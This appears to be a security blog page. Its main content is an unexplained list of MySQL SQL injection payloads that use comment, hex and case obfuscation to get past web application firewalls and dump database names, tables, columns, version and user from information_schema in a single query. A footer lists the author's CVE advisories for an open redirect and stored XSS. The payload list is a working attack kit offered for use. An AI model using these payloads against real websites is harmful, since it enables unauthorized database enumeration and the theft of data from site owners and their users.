 concat%0b(@c:=0x00,if((select%20count(*)%20from%20/*!50000information_schema*/.columns%20/*!50000where*/%20table_schema%20not%20like%200x696e666f726d6174696f6e5f736368656d61%20and%20@c:=concat%0b(@c,0x3c62723e,/*!50000table_name*/,0x2e,/*!50000column_name*/)),0x00,0x00),@c)

 concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0)%20from(information_schema./**/columns)where(table_schema=database())%20and(0x00)in(@x:=Concat/*!(@x,%200x3c62723e,%20if(%20(@tbl!=table_name),%20Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1,%202,%200x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e),%200x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/

 export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2)

 (select+concat(0x3c666f6e7420666163653d43616d627269612073697a653d323e72306f74404833583439203a3a20,version(),0x3c666f6e7420636f6c6f723d7265643e3c62723e,0x446174616261736573203a7e205b,(Select+count(Schema_name)from(information_Schema.schemata)),0x5d3c62723e5461626c6573203a7e205b,(Select+count(table_name)from(information_schema.tables)),0x5d3c62723e436f6c756d6e73203a7e205b,(Select+count(column_name)from(information_Schema.columns)),0x5d3c62723e,@)from(select(@:=0x00),(@db:=0),(@db_nr:=0),(@tbl:=0),(@tbl_nr:=0),(@col_nr:=0),(select(@)from(information_Schema.columns)where(@)in(@:=concat(@,if((@db!=table_schema),concat((@tbl_nr:=0x00),0x3c666f6e7420636f6c6f723d7265643e,LPAD(@db_nr:=@db_nr%2b1,2,0x20),0x2e20,@db:=table_schema,0x2020202020203c666f6e7420636f6c6f723d707572706c653e207b205461626c6573203a7e205b,(Select+count(table_name)from(information_schema.tables)where(table_schema=@db)),0x5d7d203c2f666f6e743e3c2f666f6e743e),0x00),if((@tbl!=table_name),concat((@col_nr:=0x00),0x3c646976207374796c653d70616464696e672d6c6566743a343070783b3e3c666f6e7420636f6c6f723d626c75653e202020,LPAD(@tbl_nr:=@tbl_nr%2b1,3,0x0b),%200x2e20,@tbl:=table_name,0x20202020203c666f6e7420636f6c6f723d707572706c653e2020207b2020436f6c756d6e73203a7e20205b,(Select+count(column_name)from(information_Schema.columns)where(table_name=@tbl)),0x5d202f203c666f6e7420636f6c6f723d626c61636b3e205265636f726473203a7e205b,(Select+if%20null(table_rows,0x30)+from+information_schema.tables+where+table_name=@tbl),0x5d207d3c2f666f6e743e3c2f666f6e743e3c2f666f6e743e3c2f6469763e),0x00),concat(0x3c646976207374796c653d70616464696e672d6c6566743a383070783b3e3c666f6e7420636f6c6f723d677265656e3e,LPAD(@col_nr:=@col_nr%2b1,3,0x0b),0x2e20,column_name,0x3c2f666f6e743e3c2f6469763e)))))x)

 +and@x:=concat+(@:=0,(select+count(*)/*!50000from*/information_schema.columns+where+table_schema=database()+and@:=concat+(@,0x3c6c693e,table_name,0x3a3a,column_name)),@)/*!50000UNION*/SELECT+

 (select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))

 (select(@x)from(select(@x:=0x00),(@nr:=0),(@tbl:=0x0),(select(0)from(information_schema.tables)where(table_schema=database())and(0x00)in(@x:=concat_ws(0x20,@x,lpad(@nr:=@nr%2b1,3,0x0b),0x2e20,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e203a3a3a3a3c2f666f6e743e3c666f6e7420636f6c6f723d626c75653e20207b2020436f6c756d6e73203a3a205b3c666f6e7420636f6c6f723d7265643e,(select+count(*)+from+information_schema.columns+where+table_name=@tbl),0x3c2f666f6e743e5d20207d3c2f666f6e743e,0x3c62723e))))x)

 (/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)
(/*!50000select*/+concat+(@:=0,(/*!50000select*/+count(*)%20from+/*!50000information_schema.tables*/+WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND@:=concat+(@,0x3c62723e,/*!50000table_name*/)),@))

Comments

Post a Comment

Popular posts from this blog

Polaris’ Intellect Core Banking Software Version 9.7.1- Open Redirect [CVE-2018-14931]

Image
[+] Credits: Neeraj Kumar, Hai Dang Long [+] Email: neeraj.iiita2009@gmail.com Vendor: ==================== http://www.polarisft.com Product: =================== Polaris’ Intellect Core Banking, Core and Portal Module Version: =================== Affected Version: 9.7.1 Vulnerability Type: ==================== Open Redirect CVE Reference: ============== CVE-2018-14931 Vulnerability Details: ====================== Polaris’ Intellect Core Banking Software, In the Core module is vulnerable to open redirect vulnerability. Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the co
Read more

Stored XSS Vulnerability in Hot Scripts Clone:Script Classified Version 3.1-[CVE-2018-7650]

Image
[+] Credits:  Neeraj Kumar [+] Email:  neeraj.iiita2009@gmail.com Vendor: ==================== https://www.phpscriptsmall.com/ Product: =================== Hot Scripts Clone:Script Classified Version 3.1 Link to access the Product: ===================== https://www.phpscriptsmall.com/product/hot-scripts-clone-script-classified/ Vulnerability Type: ========================== Cross site scripting - Stored XSS CVE Reference: ============== CVE-2018-7650 Vulnerability Details: ====================== Hot Scripts Clone:Script Classified Version 3.1 Application is vulnerable to stored XSS with the "Add New" function in Management User. Within the "Add New" section the application does not sanitize user supplied input and renders injected javascript code to the users browsers. This is different from CVE-2018-6878. An attackers use this vulnerability to inject malicious javascript code such as hijack user sessions, malicious redirect, deface web
Read more

Stored XSS Vulnerability in Bookme Control Panel 2.0-[CVE-2018-8737]

Image
[+] Credits: Neeraj Kumar [+] Email: neeraj.iiita2009@gmail.com Vendor: ==================== https://bylancer.com Product: =================== Bookme Control Panel 2.0 Link to access the Product: =================== https://bylancer.com/products/bookme-wp-booking-plugin/ Vulnerability Type: ========================== Cross site scripting - Stored XSS CVE Reference: ============== CVE-2018-8737 Vulnerability Details: ====================== Bookme Control Panel 2.0 Application is vulnerable to stored XSS within the Customers "Book Me" function. Within the Name and Note (aka custName and custNote) sections of the Customers screen, the application does not sanitize user-supplied input and renders injected JavaScript code to the user's browser. Attackers use this vulnerability to inject malicious javascript code such as hijack user sessions, malicious redirect, deface web sites, insert hostile content, redirect users, hijack the user’s browser usin
Read more